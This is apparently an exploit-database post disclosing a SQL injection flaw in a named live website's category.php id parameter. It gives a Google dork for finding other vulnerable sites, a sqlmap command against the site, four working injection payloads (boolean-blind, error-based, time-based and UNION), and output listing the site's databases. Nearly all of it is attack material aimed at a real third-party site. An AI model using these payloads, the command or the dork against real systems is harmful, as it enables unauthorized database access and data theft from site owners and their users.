# Exploit Title: Smtmax SQL Injection Vulnerability
# Author: Emyounoone
# Date: 14/04/2021
# Tested On: Kali Linux
# Contact: https://twitter.com/Emyounoone
# Google Dork: category.php?id=
----------------------------------------------------------------------------------------------------
# Vulnerable Path: https://www.smtmax.com/category.php?id=15
# python3 sqlmap.py https://www.smtmax.com/category.php?id=15 --dbs --random-agent
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=15 AND 2170=2170
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=15 AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8831=8831,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=15 AND (SELECT 1837 FROM (SELECT(SLEEP(5)))AeFo)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=15 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767071,0x56426b6f6f575059466458694b51797949556663566b4356726471756e6550646f435057764d5a45,0x717a627071),NULL,NULL-- -
---
available databases [2]:
[*] information_schema
[*] smtmax8_smtmax
